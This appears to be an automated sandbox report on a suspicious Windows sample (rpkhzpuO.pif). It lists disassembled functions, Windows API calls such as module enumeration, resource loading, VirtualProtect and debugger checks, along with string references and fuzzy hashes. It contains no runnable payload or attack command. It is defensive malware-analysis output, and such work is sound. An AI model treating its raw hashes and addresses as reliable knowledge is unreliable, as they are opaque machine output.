Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
Instruction ID: 6b6e94098aae8ed03a493fe9e1b9b7019eaaa9732113d55a8b5385f4a11af88a
Opcode Fuzzy Hash: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
Instruction Fuzzy Hash: CE411871A403689BDB21EB68CC84BDAB7FDAB08341F0404E5A64CE7245DB74AF8D8F50

Function 02B21C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
Instruction ID: b4b5eaaae65d75ed8967f4af1fe44883c9f3919e991df1f14feb89b47892d704
Opcode Fuzzy Hash: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
Instruction Fuzzy Hash: 3FA1E8767317244BE718EA7C9C803ADB386DBC4265F1842FEE52DCB387DB64C9498650

Function 02B2946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F2
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F8

Strings

yyyy, xrefs: 02B294CD

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
Instruction ID: 9d1cbbf1408f96dddcd1da2e1f7642d657ac21fd6c49c1a600ac0a5599dcdba9
Opcode Fuzzy Hash: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
Instruction Fuzzy Hash: 10214871A007389FDB11DFA8C841AAEB3BDEF09710F6100E6E94DE7651D6349E48CAA5

Function 02B38184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0

Strings

Kernel32, xrefs: 02B381CF
FlushInstructionCache, xrefs: 02B3819D

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
Instruction ID: 6cf90b896b93ff660f3034bd11dd4324f15742d64e29f41b7a1fc2a00ec1096f
Opcode Fuzzy Hash: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
Instruction Fuzzy Hash: E9016D75650704BFEB02EFA8DC41F5A77ADEB48B10F5184A0B508E7A40D634AD14CA21

Function 02B3AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AD90
IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3ADC0
IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3ADDF
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3ADEB

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction ID: af0077796bfbd479a69f6cb7f1f1febcd90d632b3f413e8c0751cdb26ecd95e3
Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction Fuzzy Hash: 9121D6B16403199BDB12DF29CC80BAE73B9EF40311F108191FE9497344DB38ED119AA0

Analysis Process: rpkhzpuO.pifPID: 3080, Parent PID: 5792COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	4.6%
Total number of Nodes:	1252
Total number of Limit Nodes:	49

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

!, xrefs: 004020CF
!, xrefs: 00401B1E
:, xrefs: 00401B28
*, xrefs: 004020E1
E, xrefs: 00401E0F
o, xrefs: 00402159
x, xrefs: 00402088
4, xrefs: 00401B64
!, xrefs: 0040201A
W, xrefs: 00402033
v, xrefs: 0040206A
U, xrefs: 004020F5
h, xrefs: 00401A6F
', xrefs: 00402006
W, xrefs: 00401B14
o, xrefs: 00401B8D
5, xrefs: 00402109
___, xrefs: 0040227D
*, xrefs: 00401A1F
%, xrefs: 004020FA
V, xrefs: 00401E19
x, xrefs: 0040214A
8, xrefs: 00401BA9
[, xrefs: 00402047
_._, xrefs: 00402257
v, xrefs: 00401B5A
x, xrefs: 00401E69
{, xrefs: 0040205B
o, xrefs: 00402097
v, xrefs: 00401E4B
{, xrefs: 0040211D
{, xrefs: 00401B4B
x, xrefs: 00401B78
0, xrefs: 00401BBD
', xrefs: 00401AF6
{, xrefs: 00401E3C
D, xrefs: 00401DFB
[, xrefs: 00401B37
6, xrefs: 004020C5
V, xrefs: 00402038
4, xrefs: 00402136
4, xrefs: 00402074
W, xrefs: 004020E6
", xrefs: 00401B0F
), xrefs: 0040202E
., xrefs: 00401B0A
W, xrefs: 00401B23
v, xrefs: 0040212C
., xrefs: 0040201F

Memory Dump Source

Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Function 252B9130 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 252B91A4

Memory Dump Source

Source File: 00000008.00000002.2265355175.00000000252B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 252B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_252b0000_rpkhzpuO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 49791f61bb92d372ee7a81286493c0308fc554bfe9ca946e84886564f7eed4d9
Instruction ID: ce85deea056cb97b1be65b51c242c98c300addcb167a81dec1a2921e4c9f7151
Opcode Fuzzy Hash: 49791f61bb92d372ee7a81286493c0308fc554bfe9ca946e84886564f7eed4d9
Instruction Fuzzy Hash: A711F4B1D002499FDB10DFAAD884B9EFBF5BF88720F14842AD519A7250D779A940CFA0

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Function 252B9308 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 252B936A

Memory Dump Source

Source File: 00000008.00000002.2265355175.00000000252B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 252B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_252b0000_rpkhzpuO.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2b80a635f7aa81559a2a2e392d0e360093e3d18894ac9b7ac51e5b30b59f837c
Instruction ID: a7b7c1a0221e68c002d3ae06f8536d89fa851929a316f12377960fddb672cd4d
Opcode Fuzzy Hash: 2b80a635f7aa81559a2a2e392d0e360093e3d18894ac9b7ac51e5b30b59f837c
Instruction Fuzzy Hash: EB1136B1D003498FDB14DFAAD8857DEFBF4AF88620F24851AD519A7280D779A940CBA4

Function 250BD6DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bdae6005d28601a66b9fcec440f8357510f6e8502526a64898ab44a7168330c
Instruction ID: c967e60ad895c3f594a8279d3f4e71fc0914edd64bb3be2791983e5b655243dc
Opcode Fuzzy Hash: 5bdae6005d28601a66b9fcec440f8357510f6e8502526a64898ab44a7168330c
Instruction Fuzzy Hash: 7D212876544204DFDB04DF14EEC0F4AFFA6FB88314F2481A9E9080B246D376E856CAE1

Function 250BD5F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2efa6edaeff810cf91d4dda5e4be1892b31d49c18979fec4a7f70f90758fb81
Instruction ID: c579f2c89541273dedbf2760e098a1be38236b5a2bd287de488b902ca91aebd1
Opcode Fuzzy Hash: c2efa6edaeff810cf91d4dda5e4be1892b31d49c18979fec4a7f70f90758fb81
Instruction Fuzzy Hash: 542103B6504244DFDB05DF14E9C0F0AFFA6FB88310F248569E9090B256C3B6E856CAA1

Function 250BD5EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
Instruction ID: dd914a666a35be8eafa6c8dda5ee1eb1303b78e875b9560b41a921cf9abaf0ea
Opcode Fuzzy Hash: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
Instruction Fuzzy Hash: CC11AF76504284CFCB01DF10D9C0B06FFB2FB88314F2486A9D8490B257C37AE55ACBA1

Function 250BD6D7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
Instruction ID: 77238a04f86523b5f2606b2e85158a77c9498abbfe18fa2ce78f308d1c5d1f6a
Opcode Fuzzy Hash: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
Instruction Fuzzy Hash: 0A11AF76544244DFCB05DF10DAC4B46FFA2FB84314F2486A9D8090B256C37AE55ACBA2

Function 250BD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6397734ca8e0b6b2fba9bf1796318bfd57d54680722bb9475f1d21d9b38209c
Instruction ID: d0e75af3eb301f3187d001ff5d72ea0b7c5d1bb17ac0700d3f67c4307040a8ce
Opcode Fuzzy Hash: e6397734ca8e0b6b2fba9bf1796318bfd57d54680722bb9475f1d21d9b38209c
Instruction Fuzzy Hash: B30152724093C49FE7124B25DC94752FFE8EF42624F19859BE9488F193C2696C45C771

Function 250BD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c55c2d3e1a4e27afbced335cc94bab0034148599eceec267dc2d9dc1953f42
Instruction ID: b994bfe8e4c87a06f0f78fb946d7579f1621fd007516ebefd5a9d1952b7a150b
Opcode Fuzzy Hash: c3c55c2d3e1a4e27afbced335cc94bab0034148599eceec267dc2d9dc1953f42
Instruction Fuzzy Hash: 0C01A7724053449AE7108B15EDC0F56FFD8EF41764F58856AEE484A242C3B9BD45C6B1

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

